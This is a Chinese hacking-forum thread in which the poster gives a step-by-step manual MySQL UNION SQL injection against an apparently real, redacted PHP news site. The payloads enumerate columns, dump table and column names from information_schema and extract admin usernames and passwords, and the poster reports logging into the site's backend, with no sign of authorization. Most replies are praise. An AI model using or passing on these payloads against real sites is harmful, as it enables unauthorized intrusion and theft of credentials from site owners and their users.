用户
搜索
  • TA的每日心情
    擦汗
    2017-7-25 20:29
  • 签到天数: 3 天

    连续签到: 1 天

    [LV.2]偶尔看看I

    i春秋-核心白帽

    Rank: 4

    0

    主题

    216

    帖子

    177

    魔法币
    收听
    2
    粉丝
    1
    注册时间
    2016-6-26

    核心白帽

    发表于 2017-7-25 21:08:28 3513224
    本帖最后由 喧嚣如梦 于 2017-7-25 22:24 编辑

    小计一次奇葩PHP+mysql手工注入(大牛勿喷)

    话不多说,直接切入主题!



    注入点:http://www.xxxx.xxxx/newsd.php?nid=283


    and 1=1 返回正确 and1=2返回错误

    说明存在注入点
    +order+by+11 返回错误
    1.png
    +order+by+10 返回正确   
    2.png
    说明存在10个字段
    +union+select+1,2,3,4,5,6,7,8,9,10 看清楚那里是-283 是让他报错用的 也可以用and 1=2 报错
    3.png
    User() 数据库用户名
    Version() 数据库版本
    Database() 当前使用的数据库名
    +union+select+1,user(),3,4,Version(),6,7,8,9,10                       (  以此类推 )
    5.png
    5.0说明可以直接查表,直接爆表
    +union+select+1,unhex(hex(GROUP_CONCAT(table_name))),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=Database()
    6.png

    爆列:+union+select+1,unhex(hex(GROUP_CONCAT(column_name))),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x745F61646D696E
    7.png                ********(表名要用HEX(16进制)进行编码!)                                                                        
    然后就就是查询了
    +union+select+1,concat(password,"-----------",username),3,4,5,6,7,8,9,10+from+t_admin
    8.png
    成功进入网站后台  !
    9.png
    (第一次发帖,做的不好请多担待!)(第一次发帖,做的不好请多担待!)


    `B$G{1PTQ8@VZ({9OFWKKR9.jpg                               

    评分

    参与人数 6积分 +11 魔法币 +20 收起 理由
    zz123000 + 10 + 5 感谢你的分享,i春秋论坛有你更精彩!.
    sn0w + 1 + 1 鼓励转贴优秀软件安全工具和文档!.
    w_uai + 5
    1302134438 + 3 欢迎分析讨论交流,i春秋论坛有你更精彩!.
    手机用户ya9u7T + 3 感谢发布原创作品,i春秋论坛因你更精彩!.
    漠尘丶 + 3 感谢你的分享,i春秋论坛有你更精彩!.

    查看全部评分

    发表于 2017-7-26 00:53:23
    漠尘丶 发表于 2017-7-26 00:52
    mysql刚好碰到瓶颈,谢谢表哥的方法,真的万分感谢!

    mysql注入

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-26 01:02:35
    漠尘丶 发表于 2017-7-26 00:59
    楼主,我也是小白,可以一起学习吗?

    一起学习一起进步!

    评分

    参与人数 1魔法币 +3 收起 理由
    漠尘丶 + 3

    查看全部评分

    使用道具 举报 回复
    小帅龙哈哈 发表于 2017-7-29 01:23
    不错,实际操作了一遍:)

    厉害了我的哥==.
    使用道具 举报 回复
    发表于 2017-7-27 00:32:57
    Naughty_淘气 发表于 2017-7-26 17:11
    听说 送魔法币@喧嚣如梦

    必须的呀
    使用道具 举报 回复
    发表于 2017-7-26 01:06:30
    喧嚣如梦 发表于 2017-7-26 01:02
    一起学习一起进步!

    厉害了我的哥。。。。。。。。。

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    TTTkeys 发表于 2017-7-26 11:09
    楼主奇葩吧,哈哈

    这都被你发现了.=.=
    使用道具 举报 回复
    先占楼,先占楼
    使用道具 举报 回复
    发表于 2017-7-25 23:31:19

    回帖奖励 +1

    我有一点基础。想找个朋友一起学习。

    评分

    参与人数 1魔法币 +5 收起 理由
    喧嚣如梦 + 5

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-25 23:51:35
    哈哈,奇葩,没怎么看到奇葩呢?
    老熟人了!

    评分

    参与人数 1魔法币 +5 收起 理由
    喧嚣如梦 + 5

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-25 23:55:06
    注入不奇葩 楼主很奇葩

    评分

    参与人数 1魔法币 +5 收起 理由
    喧嚣如梦 + 5

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-26 00:52:49
    mysql刚好碰到瓶颈,谢谢表哥的方法,真的万分感谢!

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-26 00:59:09
    楼主,我也是小白,可以一起学习吗?

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-26 01:01:32
    厉害了我表哥
    使用道具 举报 回复
    发表于 2017-7-26 01:10:20
    不错不错,很适合我

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-26 09:01:14
    已报警

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-26 10:39:00
    不错,但是信息已经泄漏了啊

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    发表于 2017-7-26 11:09:42
    楼主奇葩吧,哈哈

    评分

    参与人数 1魔法币 +1 收起 理由
    喧嚣如梦 + 1

    查看全部评分

    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册